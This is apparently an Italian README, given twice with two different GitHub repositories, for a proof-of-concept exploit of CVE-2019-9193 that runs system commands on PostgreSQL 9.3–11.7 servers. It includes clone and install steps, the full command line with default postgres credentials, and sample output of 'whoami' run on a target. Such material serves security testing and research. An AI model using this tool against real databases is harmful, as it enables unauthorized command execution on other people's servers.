
Strumento PoC progettato per sfruttare una vulnerabilità autenticata di esecuzione remota di codice (RCE) in alcune versioni di PostgreSQL (9.3 - 11.7)
GenPostgresRCEExploit è uno strumento PoC progettato per sfruttare una vulnerabilità autenticata di esecuzione remota del codice (RCE) in alcune versioni di PostgreSQL (9.3 - 11.7). Consente agli utenti autenticati di eseguire comandi di sistema su un server di database PostgreSQL vulnerabile a CVE-2019-9193.
psycopg2 da pip)libpq-dev da apt)git clone https://github.com/AxthonyV/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c "<system_command>"
-i, --ip: Indirizzo IP del server PostgreSQL (Predefinito: 127.0.0.1)-p, --port: Porta del server PostgreSQL (Predefinito: 5432)-d, --database: Nome del database PostgreSQL (Predefinito: template1)-U, --user: Nome utente per connettersi al server PostgreSQL (Predefinito: postgres)-P, --password: Password per connettersi al server PostgreSQL (Predefinito: postgres)-c, ---command: Comando di sistema da eseguire sul server-t, --timeout: Timeout di connessione in secondi (Predefinito: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Questo esempio si connette al server PostgreSQL su 192.168.1.10, autentica con le credenziali fornite ed esegue il comando whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Connection to PostgreSQL database at 192.168.1.10:5432
[+] Connection successfully established
[+] PostgreSQL version check
[+] Vulnerable PostgreSQL version detected: 10.4
[+] Temporary table creation: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Command successfully executed
postgres
Questo strumento è destinato esclusivamente a scopi educativi e a test etici. L'uso non autorizzato di questo strumento contro qualsiasi sistema è illegale e severamente proibito. Gli autori non si assumono alcuna responsabilità per un uso improprio.
GenPostgresRCEExploit è un exploit PoC progettato per sfruttare la vulnerabilità di esecuzione remota del codice (RCE) in alcune versioni di PostgreSQL (9.3 - 11.7). Il programma consente agli utenti autenticati di eseguire comandi di sistema su un server PostgreSQL vulnerabile a CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <IP address> -p <port> -d <database_name> -U <user> -P <password> -c "<system_command>"
-i, --ip: Indirizzo IP del server PostgreSQL (Predefinito: 127.0.0.1)-p, --port: Porta del server PostgreSQL (Predefinito: 5432)-d, --database: Nome del database PostgreSQL (Predefinito: template1)-U, --user: Nome utente per connettersi al server PostgreSQL (Predefinito: postgres)-P, --password: Password per connettersi al server PostgreSQL (Predefinito: postgres)-c, --command: Comando di sistema da eseguire sul server-t, --timeout: Timeout di connessione in secondi (Predefinito: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
In questo esempio, il programma si connette al server PostgreSQL su 192.168.1.10, autentica con le credenziali specificate ed esegue il comando whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Connection to PostgreSQL database at 192.168.1.10:5432
[+] Connection successfully established
[+] PostgreSQL version check
[+] Vulnerable PostgreSQL version detected: 10.4
[+] Temporary table creation: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Command successfully executed
postgres
Questo strumento è destinato esclusivamente a scopi educativi e a test legali. L'uso non autorizzato di questo strumento contro qualsiasi sistema è illegale e severamente proibito. Gli autori non sono responsabili per qualsiasi uso improprio.